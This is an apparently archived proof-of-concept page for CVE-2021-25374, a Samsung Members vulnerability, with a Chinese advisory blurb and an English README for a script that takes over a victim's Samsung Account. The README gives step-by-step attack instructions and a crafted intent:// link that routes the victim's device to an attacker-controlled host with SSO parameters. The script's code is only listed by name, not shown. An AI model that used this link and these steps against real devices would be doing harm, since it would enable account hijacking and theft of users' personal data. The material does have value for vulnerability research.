Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-25374 PoC — SAMSUNG Mobile devices 安全漏洞

Source
Associated Vulnerability
Title:SAMSUNG Mobile devices 安全漏洞 (CVE-2021-25374)
Description:SAMSUNG Mobile devices是韩国三星(SAMSUNG)公司的一系列的三星移动设备,包括手机、平板等。 SAMSUNG Mobile devices 存在安全漏洞,该漏洞允许远程攻击者可利用该漏洞访问与三星账户相关的用户数据。
Description
This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.
Readme
# CVE-2021-25374 - Samsung Account Access Script

This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.

## How to use this script:

1) Host a web server and have it host a web page with the following link:

`<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>`

NOTE: replace "\<attacker IP\>" with the IP address that you'll be running this script from.

2) Run this script

`python3 ./samsung_account_access.py`

3) Using a Samsung Phone, browse to the web server and click on the link

4) Let the script do its thing

More information about the issue this script exploits can be found here: <placeholder>
File Snapshot

[4.0K] /data/pocs/6ce3364d0b085e0304aa209cbecfb27d3d59db2c ├── [ 931] README.md └── [ 12K] samsung_account_access.py 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.